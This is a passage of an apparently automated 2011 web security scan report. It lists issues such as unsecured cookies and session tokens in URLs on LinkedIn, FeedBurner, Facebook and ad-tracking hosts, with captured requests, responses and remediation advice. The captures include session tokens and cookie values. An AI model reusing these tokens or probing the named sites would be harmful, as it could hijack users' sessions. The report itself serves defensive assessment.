leo_auth_token="GST:8lJ4lDkdP0OE0h6j6mXCCjzzzkaomys3-lXw4IkIpLaKrVERcPeQ09:1315099580:26e1b09e2a8704070bf09a8c9ebfe0696266e3a0"; Version=1; Max-Age=1799; Expires=Sun, 04-Sep-2011 01:56:19 GMT; Path=/
s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
sl="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/
NSC_MC_QH_MFP=ffffffffaf1999f445525d5f4f58455e445a4a421968;expires=Sun, 04-Sep-2011 01:58:50 GMT;path=/;httponly

The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Issue background

If the secure flag is set on a cookie, then browsers will not submit the cookie in any requests that use an unencrypted HTTP connection, thereby preventing the cookie from being trivially intercepted by an attacker monitoring network traffic. If the secure flag is not set, then the cookie will be transmitted in clear-text if the user visits any HTTP URLs within the cookie's scope. An attacker may be able to induce this event by feeding a user suitable links, either directly or via another web site. Even if the domain which issued the cookie does not host any content that is accessed over HTTP, an attacker may be able to use links of the form http://example.com:443/ to perform the same attack.

Issue remediation

The secure flag should be set on all cookies that are used for transmitting sensitive data when accessing content over HTTPS. If cookies are used to transmit session tokens, then areas of the application that are accessed over HTTPS should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications.

Request

GET /secure/login HTTP/1.1
Host: www.linkedin.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
P3P: CP="CAO DSP COR CUR ADMi DEVi TAIi PSAi PSDi IVAi IVDi CONi OUR DELi SAMi UNRi PUBi OTRi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT POL PRE"
Expires: 0
Pragma: no-cache
Cache-control: no-cache, must-revalidate, max-age=0
Set-Cookie: sl="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: leo_auth_token="GST:8lJ4lDkdP0OE0h6j6mXCCjzzzkaomys3-lXw4IkIpLaKrVERcPeQ09:1315099580:26e1b09e2a8704070bf09a8c9ebfe0696266e3a0"; Version=1; Max-Age=1799; Expires=Sun, 04-Sep-2011 01:56:19 GMT; Path=/
Set-Cookie: s_leo_auth_token="delete me"; Version=1; Max-Age=0; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: lang="v=2&lang=en&c="; Version=1; Domain=linkedin.com; Path=/
Content-Type: text/html;charset=UTF-8
Vary: Accept-Encoding
Date: Sun, 04 Sep 2011 01:26:19 GMT
Set-Cookie: NSC_MC_QH_MFP=ffffffffaf1999f445525d5f4f58455e445a4a421968;expires=Sun, 04-Sep-2011 01:58:50 GMT;path=/;httponly
Content-Length: 16499

<!DOCTYPE html>
<html lang="en">
<head>

<meta http-equiv="content-type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=9">
<meta name="p
...[SNIP]...

10. Session token in URL previous next
There are 7 instances of this issue:

http://charlotteobserver.adperfect.com/
http://control.adap.tv/control
http://feedburner.google.com/fb/a/mailverify
http://log.adap.tv/log
http://qlog.adap.tv/log
http://sprint.tt.omtrdc.net/m2/sprint/mbox/standard
http://www.facebook.com/extern/login_status.php

Issue background

Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or emailed around by users. They may be disclosed to third parties via the Referer header when any off-site links are followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.

Issue remediation

The application should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in forms that are submitted using the POST method.

10.1. http://charlotteobserver.adperfect.com/ previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://charlotteobserver.adperfect.com
Path:	/

Issue detail

The response contains the following links that appear to contain session tokens:

http://charlotteobserver.adperfect.com/default.html?pubid=none&-session=ComboAd:32177B6A160c72C7C8SLM4124B7B
http://charlotteobserver.adperfect.com/password.html?-session=ComboAd:32177B6A160c72C7C8SLM4124B7B

Request

GET / HTTP/1.1
Host: charlotteobserver.adperfect.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 04 Sep 2011 01:22:16 GMT
Server: Apache
MIME-Version: 1.0
Content-Length: 15034
Vary: Accept-Encoding
MS-Author-Via: DAV
Connection: close
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
   <head>

           <title>O
...[SNIP]...
<span class="ap_loginForm_forgotPass"><a href="password.html?-session=ComboAd:32177B6A160c72C7C8SLM4124B7B" class="sm">Forgot Password?</a>
...[SNIP]...
</span><a href="http://charlotteobserver.adperfect.com/default.html?pubid=none&-session=ComboAd:32177B6A160c72C7C8SLM4124B7B">Home</a>
...[SNIP]...

10.2. http://control.adap.tv/control previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://control.adap.tv
Path:	/control

Issue detail

The URL in the request appears to contain a session token within the query string:

http://control.adap.tv/control?context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&categories=sports&width=300&isTop=true&height=225&as=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&sessionId=25w4w9&htmlEnabled=true&eov=cuv775

Request

GET /control?context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte%20Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&categories=sports&width=300&isTop=true&height=225&as=3&key=cinesport&keywords=sports%2Cbasketball%2Cbaseball%2Chockey%2Cnascar&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&sessionId=25w4w9&htmlEnabled=true&eov=cuv775 HTTP/1.1
Host: control.adap.tv
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]}}}"

Response

10.3. http://feedburner.google.com/fb/a/mailverify previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://feedburner.google.com
Path:	/fb/a/mailverify

Issue detail

The response contains the following links that appear to contain session tokens:

http://feedburner.google.com/fb/a/home?gsessionid=xLQwG_KvXxSf9t9O8zC_nw
http://feedburner.google.com/fb/a/tos?gsessionid=xLQwG_KvXxSf9t9O8zC_nw

Request

GET /fb/a/mailverify HTTP/1.1
Host: feedburner.google.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=UTF-8
Date: Sun, 04 Sep 2011 01:22:27 GMT
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Set-Cookie: S=izeitgeist-ad-metrics=t0E3hsRy46s:feedburner-control-panel=xLQwG_KvXxSf9t9O8zC_nw:photos_html=gkFJwX2XgYEBqqOKgqr6OA; Domain=.google.com; Path=/; HttpOnly
Server: GSE
Expires: Sun, 04 Sep 2011 01:22:27 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html>

<head>
<meta name="r
...[SNIP]...
<h1><a href="/fb/a/home?gsessionid=xLQwG_KvXxSf9t9O8zC_nw">FeedBurner</a>
...[SNIP]...
<div id="footer">
©2004–2011
Google
(<a href="http://feedburner.google.com/fb/a/tos?gsessionid=xLQwG_KvXxSf9t9O8zC_nw">Terms of Service</a>
...[SNIP]...

10.4. http://log.adap.tv/log previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://log.adap.tv
Path:	/log

Issue detail

The URL in the request appears to contain a session token within the query string:

http://log.adap.tv/log?event=crossViewFilter&rs=p&adSourceId=28172&bidId=&afppId=&exSId=14279&adSpotId=11570&pet=preroll&pod=1&position=1&adPlanId=4148&adaptag=&categories=sports&sessionId=25w4w9&nap=false&context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte+Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&height=225&htmlEnabled=true&key=cinesport&uid=-7050735172170286629&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&duration=&id=&url=&width=300&zid=&playHeadTime=0&as=3&viewNo=1&serverRev=66573&playerRev=66583&eov=1315097086197

Request

GET /log?event=crossViewFilter&rs=p&adSourceId=28172&bidId=&afppId=&exSId=14279&adSpotId=11570&pet=preroll&pod=1&position=1&adPlanId=4148&adaptag=&categories=sports&sessionId=25w4w9&nap=false&context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte+Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&height=225&htmlEnabled=true&key=cinesport&uid=-7050735172170286629&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&duration=&id=&url=&width=300&zid=&playHeadTime=0&as=3&viewNo=1&serverRev=66573&playerRev=66583&eov=1315097086197 HTTP/1.1
Host: log.adap.tv
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]}}}"; adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-03+17%3A44%3A46"

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Content-Type: text/plain
Connection: Keep-Alive
Content-Length: 0

10.5. http://qlog.adap.tv/log previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://qlog.adap.tv
Path:	/log

Issue detail

The URL in the request appears to contain a session token within the query string:

http://qlog.adap.tv/log?event=availsFailure&failureAvails=%2225857%22%3A0.05939691936008503%2C%2223193%22%3A0.023731854751251523%2C%2225858%22%3A0.05542092357376735%2C%2228180%22%3A0.7897857684152726%2C%2220137%22%3A0.00400168723473%2C%2218971%22%3A0.047632449509923264%2C%2217530%22%3A0.0053719%2C%2223208%22%3A0.014658497154970253&adSourceId=28172&bidId=&afppId=&exSId=14279&adSpotId=11570&pet=preroll&pod=1&position=1&adPlanId=4148&adaptag=&categories=sports&sessionId=25w4w9&nap=false&context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte+Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&height=225&htmlEnabled=true&key=cinesport&uid=-7050735172170286629&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&duration=&id=&url=&width=300&zid=&playHeadTime=0&as=3&viewNo=&serverRev=66573&playerRev=66583&eov=1315097086197

Request

GET /log?event=availsFailure&failureAvails=%2225857%22%3A0.05939691936008503%2C%2223193%22%3A0.023731854751251523%2C%2225858%22%3A0.05542092357376735%2C%2228180%22%3A0.7897857684152726%2C%2220137%22%3A0.00400168723473%2C%2218971%22%3A0.047632449509923264%2C%2217530%22%3A0.0053719%2C%2223208%22%3A0.014658497154970253&adSourceId=28172&bidId=&afppId=&exSId=14279&adSpotId=11570&pet=preroll&pod=1&position=1&adPlanId=4148&adaptag=&categories=sports&sessionId=25w4w9&nap=false&context=ai_view%3D1%2CstartMode%3DAI%2Cui_view%3D1%2CaffiliateId%3DCharlotte+Observer%2Cfold%3Da%2CplayerName%3Dcharlotteobservergeneric%2CplayerTarget%3D1%2Cview%3D1&height=225&htmlEnabled=true&key=cinesport&uid=-7050735172170286629&pageUrl=http%3A%2F%2Fs3.cinesport.com%2Fplayers%2Fcharlotteobservergeneric.html&duration=&id=&url=&width=300&zid=&playHeadTime=0&as=3&viewNo=&serverRev=66573&playerRev=66583&eov=1315097086197 HTTP/1.1
Host: qlog.adap.tv
Proxy-Connection: keep-alive
Referer: http://s3.cinesport.com/app_v2/CsprtLitePlayer.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: adaptv_unique_user_cookie="8003939466491013594__TIME__2011-09-03+17%3A44%3A46"; asptvw1="ap4148%2C1%2C2011-09-03%2F18-44-50"; audienceData="{\"v\":2,\"providers\":{\"8\":{\"f\":1317538800,\"e\":1317538800,\"s\":[1672],\"a\":[]},\"2\":{\"f\":1317625200,\"e\":1317625200,\"s\":[],\"a\":[]},\"20\":{\"f\":1317625200,\"e\":1317625200,\"s\":[],\"a\":[]}}}"; rtbData0="key=dataxu:value=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F:expiresAt=Wed+Nov+02+17%3A44%3A51+PDT+2011:32-Compatible=true"

Response

HTTP/1.1 200 OK
Server: adaptv/1.0
Content-Type: text/plain
Connection: Keep-Alive
Content-Length: 0

10.6. http://sprint.tt.omtrdc.net/m2/sprint/mbox/standard previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://sprint.tt.omtrdc.net
Path:	/m2/sprint/mbox/standard

Issue detail

The URL in the request appears to contain a session token within the query string:

http://sprint.tt.omtrdc.net/m2/sprint/mbox/standard?mboxHost=www.sprint.com&mboxSession=1315097027971-178294&mboxPage=1315097027971-178294&screenHeight=1200&screenWidth=1920&browserWidth=1233&browserHeight=1037&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&mbox=sprint-interstitial-mbox&mboxId=0&mboxTime=1315079036636&mboxURL=http%3A%2F%2Fwww.sprint.com%2F&mboxReferrer=http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dsprint%26date%3D2011-9-3%26sa%3DX&mboxVersion=40

Request

GET /m2/sprint/mbox/standard?mboxHost=www.sprint.com&mboxSession=1315097027971-178294&mboxPage=1315097027971-178294&screenHeight=1200&screenWidth=1920&browserWidth=1233&browserHeight=1037&browserTimeOffset=-300&colorDepth=16&mboxXDomain=enabled&mboxCount=1&mbox=sprint-interstitial-mbox&mboxId=0&mboxTime=1315079036636&mboxURL=http%3A%2F%2Fwww.sprint.com%2F&mboxReferrer=http%3A%2F%2Fwww.google.com%2Ftrends%2Fhottrends%3Fq%3Dsprint%26date%3D2011-9-3%26sa%3DX&mboxVersion=40 HTTP/1.1
Host: sprint.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.sprint.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: s_vi_holtihx7Bhabx7Dhx7F=[CS]v4|2730A37085079998-400001008005E291|4E6146E0[CE]

Response

HTTP/1.1 200 OK
P3P: CP="NOI DSP CURa OUR STP COM"
Set-Cookie: mboxPC=1315097027971-178294.19; Domain=sprint.tt.omtrdc.net; Expires=Sun, 18-Sep-2011 00:45:30 GMT; Path=/m2/sprint
Content-Type: text/javascript
Content-Length: 179
Date: Sun, 04 Sep 2011 00:45:30 GMT
Server: Test & Target

mboxFactories.get('default').get('sprint-interstitial-mbox',0).setOffer(new mboxOfferDefault()).loaded();mboxFactories.get('default').getPCId().forceId("1315097027971-178294.19");

10.7. http://www.facebook.com/extern/login_status.php previous next

Summary

Severity:	Medium
Confidence:	Firm
Host:	http://www.facebook.com
Path:	/extern/login_status.php

Issue detail

The URL in the request appears to contain a session token within the query string:

http://www.facebook.com/extern/login_status.php?api_key=150777544942552&app_id=150777544942552&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfc9d46b2c%26origin%3Dhttp%253A%252F%252Fwww.charlotteobserver.com%252Ff3bf22f854%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df13815c2e4%26origin%3Dhttp%253A%252F%252Fwww.charlotteobserver.com%252Ff3bf22f854%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfe739c6%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df308fdb45c%26origin%3Dhttp%253A%252F%252Fwww.charlotteobserver.com%252Ff3bf22f854%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfe739c6&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df7783dc98%26origin%3Dhttp%253A%252F%252Fwww.charlotteobserver.com%252Ff3bf22f854%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfe739c6&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2b9cd374%26origin%3Dhttp%253A%252F%252Fwww.charlotteobserver.com%252Ff3bf22f854%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfe739c6&sdk=joey&session_origin=1&session_version=3

Request

GET /extern/login_status.php?api_key=150777544942552&app_id=150777544942552&channel_url=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Dfc9d46b2c%26origin%3Dhttp%253A%252F%252Fwww.charlotteobserver.com%252Ff3bf22f854%26relation%3Dparent.parent%26transport%3Dpostmessage&display=hidden&extern=2&locale=en_US&next=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df13815c2e4%26origin%3Dhttp%253A%252F%252Fwww.charlotteobserver.com%252Ff3bf22f854%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfe739c6%26result%3D%2522xxRESULTTOKENxx%2522&no_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df308fdb45c%26origin%3Dhttp%253A%252F%252Fwww.charlotteobserver.com%252Ff3bf22f854%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfe739c6&no_user=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df7783dc98%26origin%3Dhttp%253A%252F%252Fwww.charlotteobserver.com%252Ff3bf22f854%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfe739c6&ok_session=http%3A%2F%2Fstatic.ak.fbcdn.net%2Fconnect%2Fxd_proxy.php%3Fversion%3D3%23cb%3Df2b9cd374%26origin%3Dhttp%253A%252F%252Fwww.charlotteobserver.com%252Ff3bf22f854%26relation%3Dparent%26transport%3Dpostmessage%26frame%3Dfe739c6&sdk=joey&session_origin=1&session_version=3 HTTP/1.1
Host: www.facebook.com
Proxy-Connection: keep-alive
Referer: http://www.charlotteobserver.com/2011/09/03/2577566/raceday-danica-already-gone.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: campaign_click_url=%2Fcampaign%2Flanding.php%3Fcampaign_id%3D137675572948107%26partner_id%3D%26placement%3Drecommendations%26extra_2%3DUS; datr=ivleTmw_y94Pr8J55qefqDAM

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
X-FB-Server: 10.64.196.55
X-Cnection: close
Date: Sun, 04 Sep 2011 00:44:11 GMT
Content-Length: 259

<script type="text/javascript">
parent.postMessage("cb=f7783dc98&origin=http\u00253A\u00252F\u00252Fwww.charlotteobserver.com\u00252Ff3bf22f854&relation=parent&transport=postmessage&frame=fe739c6", "h
...[SNIP]...

11. SSL certificate previous next
There are 13 instances of this issue:

https://google.com/
https://login.yahoo.com/
https://observ.subscribeobserver.com/
https://cdns.gigya.com/
https://commerce.us.reuters.com/
https://docs.google.com/
https://mail.google.com/
https://maps-api-ssl.google.com/
https://sites.google.com/
https://socialize.gigya.com/
https://subscriberservices.mcclatchy.com/
https://www.linkedin.com/
https://www.sprint.net/

Issue background

SSL helps to protect the confidentiality and integrity of information in transit between the browser and server, and to provide authentication of the server's identity. To serve this purpose, the server must present an SSL certificate which is valid for the server's hostname, is issued by a trusted authority and is valid for the current date. If any one of these requirements is not met, SSL connections to the server will not provide the full protection for which SSL is designed.

It should be noted that various attacks exist against SSL in general, and in the context of HTTPS web connections. It may be possible for a determined and suitably-positioned attacker to compromise SSL connections without user detection even when a valid SSL certificate is used.

11.1. https://google.com/ previous next